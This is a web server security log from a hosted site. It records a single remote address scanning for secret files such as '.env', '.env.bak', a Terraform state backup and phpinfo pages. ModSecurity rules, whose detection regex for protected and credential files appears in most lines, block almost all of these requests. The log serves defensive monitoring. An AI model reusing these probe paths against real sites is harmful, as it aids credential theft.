[Tue May 26 15:25:06.829085 2026] [security2:error] [pid 707292:tid 707372] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/node/api/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7cAAAtE8"]
[Tue May 26 15:25:06.830458 2026] [security2:error] [pid 707292:tid 707354] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/node/backend/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7cQAAtD0"]
[Tue May 26 15:25:06.830469 2026] [security2:error] [pid 707292:tid 707369] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/nodeapi/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7cgAAtEw"]
[Tue May 26 15:25:06.831863 2026] [security2:error] [pid 707292:tid 707357] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/nodeweb/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7cwAAmEA"]
[Tue May 26 15:25:06.835209 2026] [security2:error] [pid 707292:tid 707364] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/old/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7dwAAmEc"]
[Tue May 26 15:25:06.835876 2026] [security2:error] [pid 707292:tid 707365] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/opt/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7eQAAmEg"]
[Tue May 26 15:25:07.089243 2026] [security2:error] [pid 707292:tid 707406] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/php.php"] [unique_id "ahVt-9KAqlRPSIEFAut7lAAA_XE"]
[Tue May 26 15:25:07.089372 2026] [security2:error] [pid 707292:tid 707403] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/php-info.php"] [unique_id "ahVt-9KAqlRPSIEFAut7kwAA_W4"]
[Tue May 26 15:25:07.089728 2026] [security2:error] [pid 707292:tid 707396] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/php_info.php"] [unique_id "ahVt-9KAqlRPSIEFAut7lQAA_Wc"]
[Tue May 26 15:25:07.122648 2026] [security2:error] [pid 707292:tid 707378] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/phpinfo.php"] [unique_id "ahVt-9KAqlRPSIEFAut7lwAAiVU"]
[Tue May 26 15:25:07.124059 2026] [security2:error] [pid 707292:tid 707412] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/portal/.env"] [unique_id "ahVt-9KAqlRPSIEFAut7mAAAiXc"]
[Tue May 26 15:25:07.127477 2026] [security2:error] [pid 707292:tid 707394] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/prod/.env"] [unique_id "ahVt-9KAqlRPSIEFAut7ngAAiWU"]
[Tue May 26 15:25:07.128206 2026] [security2:error] [pid 707292:tid 707388] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/product/.env"] [unique_id "ahVt-9KAqlRPSIEFAut7nwAAiV8"]
[Tue May 26 15:25:07.129104 2026] [security2:error] [pid 707292:tid 707410] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/production/.env"] [unique_id "ahVt-9KAqlRPSIEFAut7oAAAiXU"]
[Tue May 26 15:25:07.183445 2026] [security2:error] [pid 707292:tid 707293] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/project/.env"] [unique_id "ahVt-9KAqlRPSIEFAut7pwABAwA"]
[Tue May 26 15:25:07.235275 2026] [security2:error] [pid 707292:tid 707303] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/public-api/.env"] [unique_id "ahVt-9KAqlRPSIEFAut7qgAA5Qo"]
[Tue May 26 15:25:07.236550 2026] [security2:error] [pid 707292:tid 707311] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/public/.env"] [unique_id "ahVt-9KAqlRPSIEFAut7qwAA5RI"]
[Tue May 26 15:25:07.266202 2026] [security2:error] [pid 707292:tid 707417] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/public/phpinfo.php"] [unique_id "ahVt-9KAqlRPSIEFAut7rAAAsnw"]
[Tue May 26 15:25:07.270905 2026] [security2:error] [pid 707292:tid 707324] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/public_html/.env"] [unique_id "ahVt-9KAqlRPSIEFAut7rgAAhh8"]
[Tue May 26 15:25:07.273595 2026] [security2:error] [pid 707292:tid 707302] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/qa/.env"] [unique_id "ahVt-9KAqlRPSIEFAut7sAAAhgk"]
[Tue May 26 15:25:07.567160 2026] [security2:error] [pid 707292:tid 707308] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/s3/.env.bak"] [unique_id "ahVt-9KAqlRPSIEFAut71gAArw8"]
[Tue May 26 15:25:07.676239 2026] [security2:error] [pid 707292:tid 707339] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/server/.env"] [unique_id "ahVt-9KAqlRPSIEFAut75wAA-y4"]
[Tue May 26 15:25:07.678731 2026] [security2:error] [pid 707292:tid 707415] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/server/api/.env"] [unique_id "ahVt-9KAqlRPSIEFAut76AAA-3o"]
[Tue May 26 15:25:07.709611 2026] [security2:error] [pid 707292:tid 707345] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/server/backend/.env"] [unique_id "ahVt-9KAqlRPSIEFAut76wAAvDQ"]
[Tue May 26 15:25:07.772722 2026] [security2:error] [pid 707292:tid 707338] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/service/.env"] [unique_id "ahVt-9KAqlRPSIEFAut79wAA1i0"]
[Tue May 26 15:25:07.822321 2026] [security2:error] [pid 707292:tid 707376] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/services/.env"] [unique_id "ahVt-9KAqlRPSIEFAut7-AAA11M"]
[Tue May 26 15:25:07.863216 2026] [security2:error] [pid 707292:tid 707298] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/shared/.env"] [unique_id "ahVt-9KAqlRPSIEFAut8AwAA1AU"]
[Tue May 26 15:25:07.863539 2026] [security2:error] [pid 707292:tid 707373] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/shop/.env"] [unique_id "ahVt-9KAqlRPSIEFAut8AgAA1FA"]
[Tue May 26 15:25:07.866653 2026] [security2:error] [pid 707292:tid 707370] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/src/.env"] [unique_id "ahVt-9KAqlRPSIEFAut8CQAA1E0"]
[Tue May 26 15:25:08.009993 2026] [security2:error] [pid 707292:tid 707385] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/stage/.env"] [unique_id "ahVt_NKAqlRPSIEFAut8FQAAnFw"]
[Tue May 26 15:25:08.010069 2026] [security2:error] [pid 707292:tid 707367] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/staging/.env"] [unique_id "ahVt_NKAqlRPSIEFAut8FgAAnEo"]
[Tue May 26 15:25:08.010766 2026] [security2:error] [pid 707292:tid 707336] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/srv/.env"] [unique_id "ahVt_NKAqlRPSIEFAut8FwAAnCs"]
[Tue May 26 15:25:08.118105 2026] [security2:error] [pid 707292:tid 707393] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/stg/.env"] [unique_id "ahVt_NKAqlRPSIEFAut8IgAAo2Q"]
[Tue May 26 15:25:08.155271 2026] [security2:error] [pid 707292:tid 707397] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/stripe/.env"] [unique_id "ahVt_NKAqlRPSIEFAut8LAAAtGg"]
[Tue May 26 15:25:08.157546 2026] [cgid:error] [pid 707292:tid 707406] [remote 195.178.110.199:59060] AH01264: stderr from /home2/onesomzc/public_html/www.sevenstar.onesoft.in/sysinfo.cgi: script not found or unable to stat
[Tue May 26 15:25:08.214835 2026] [security2:error] [pid 707292:tid 707378] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/terraform.tfstate.backup"] [unique_id "ahVt_NKAqlRPSIEFAut8NgAAvVU"]
[Tue May 26 15:25:08.293979 2026] [security2:error] [pid 707292:tid 707402] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/test.php"] [unique_id "ahVt_NKAqlRPSIEFAut8OgAAp20"]
[Tue May 26 15:25:08.301046 2026] [security2:error] [pid 707292:tid 707295] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/user/.env"] [unique_id "ahVt_NKAqlRPSIEFAut8PwAA_wI"]
[Tue May 26 15:25:08.301125 2026] [security2:error] [pid 707292:tid 707394] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/test/.env"] [unique_id "ahVt_NKAqlRPSIEFAut8OwAA_2U"]
[Tue May 26 15:25:08.303014 2026] [security2:error] [pid 707292:tid 707409] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/v1/.env"] [unique_id "ahVt_NKAqlRPSIEFAut8QQAA_3Q"]
[Tue May 26 15:25:08.305416 2026] [security2:error] [pid 707292:tid 707311] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/v2/.env"] [unique_id "ahVt_NKAqlRPSIEFAut8QwAA_xI"]
